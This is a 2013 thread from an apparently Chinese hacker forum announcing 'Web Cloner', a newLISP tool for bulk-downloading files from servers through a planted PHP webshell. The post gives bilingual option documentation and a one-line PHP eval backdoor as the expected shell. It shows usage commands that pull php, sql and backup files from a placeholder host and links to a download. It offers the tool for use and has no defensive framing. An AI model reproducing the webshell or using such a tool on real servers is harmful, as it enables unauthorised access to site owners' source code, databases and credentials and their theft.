搜索
查看: 542|回复: 2

服务器文件批量下载工具:Web Cloner v0.1

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-8-26 20:07:15 | 显示全部楼层 |阅读模式
Web Cloner [掠食者] 用来在服务器端无法使用系统命令和ZIP库文件的情况下, 批量下载服务器上的文件。待完善的功能包括多语言支持, 下载频度控制, Server代码动态切换, 多文件合并下载。
Options:
    -s:  Webshell 路径[必选]. (include code ex: <?php @eval($_POST['sb']);?> ).
    -p:  Webshell 密码[必选]. (lie above shell code ex: 'sb').
    -i:  想要下载的文件的后缀, 判断代码在服务端执行[可选]. (ex:php inc sql  bak).
    -e:  想要排除的文件的后缀, 判断代码在服务端执行[可选]. (ex:php inc sql  bak).
    -ds: 服务器上要打包的目录的起始目录, 此目录相对于webshell[可选]. (server directory you want to save).
    -dc: 本地用来保存下载文件的目录, 此目录相对于当前程序[可选]. (local directory to save the file).
    -t:  超时[可选]. 默认 15 秒.
    -bf: 大文件处理[可选]. 为了避免下载过大的文件, 影响整体进程, 只将大文件路径记录下来, 方便后续处理.
         默认不下载如下后缀的大文件(及只使用-bf选项时): "zip|rar|tar|gz|tgz|z|7z|bz2|jar|iso|cab|mdb|mdf|ldf|log".
         可手工指定替换默认的大文件后缀列表. (ex: -bf exe iso)
Usage:
    newlisp cloner.lsp -s http://xxxx.com/cwk.php -p pwd [-i][-e][-ds][-dc][-t][-bf]
    newlisp cloner.lsp -h
    newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -e jpeg jpg png gif html htm -safe -dc result
    newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -i php -ds . -dc .  -t 20000
    newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb -i php -ds  ../  -dc result
    newlisp cloner.lsp -s http://xxxx.com/cwk.php -p sb
Notice:
    Web Cloner [掠食者]用来在服务器端无法使用系统命令和ZIP库文件的情况下, 批量下载服务器上的文件.
    目前只支持PHP, 其他语言支持会在后续版本加入(因为调试很费时0.0!, 欢迎有经验的同学加入研究探讨^_^.).
    编译方式: newlisp  -x cloner.lsp cloner.exe (win) newlisp -x cloner.lsp cloner  (nix)
Options:
    -s:  Webshell path (include code ex: <?php @eval($_POST['sb']);?> ).
    -p:  Webshell pass (lie above shell code ex: 'sb').
    -i:  Suffix of files you want to download (ex:php inc sql  bak).
    -e:  Suffix of files you don't want to download (ex:php inc sql  bak).
    -ds: Relative directory with the webshell on server (server directory you want to save).
    -dc: Relative directory with the cloner (local directory to save the file).
    -t:  Time out. default 15 seconds.
    -bf: Bigfile process. all bigfile pathswill be recorded to facilitate the next step.
         Deafault don't down file with  following suffix  "zip|rar|tar|gz|tgz|z|7z|bz2|jar|iso|cab|mdb|mdf|ldf|log"
         But you can manually specify  particular suffixs to replace the default list. (ex: -bf exe iso)项目地址 Download

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
 楼主| 发表于 2013-8-26 20:08:26 | 显示全部楼层
项目地址:https://gitcafe.com/CnGrayHat/Cloner     和  Download地址:http://www.cngrayhat.org/archives/192

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-8-28 12:29:01 | 显示全部楼层
路过,支持一下啦
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表